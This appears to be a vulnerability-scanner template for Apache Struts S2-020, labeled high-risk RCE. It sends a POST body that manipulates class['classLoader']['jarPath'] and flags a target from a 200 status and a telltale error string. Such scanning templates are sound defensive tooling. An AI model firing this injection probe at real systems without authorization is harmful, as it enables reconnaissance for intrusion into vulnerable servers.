id: struct-s2-020
info:
  name: Apache Struct S2-020 - RCE
  risk: High

requests:
  - method: POST
    redirect: false
    url: >-
      {{.BaseURL}}{{.Path}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: >-
      class[%27classLoader%27][%27jarPath%27]=1024
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "No result defined for action")

reference:
  author: theblackturtle
